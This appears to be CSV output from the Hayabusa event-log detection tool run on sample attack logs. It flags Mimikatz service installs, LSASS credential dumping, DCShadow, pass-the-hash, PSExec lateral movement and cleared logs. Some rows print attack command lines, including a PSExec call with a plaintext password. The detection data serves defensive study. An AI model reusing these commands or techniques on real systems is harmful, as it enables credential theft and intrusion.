2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
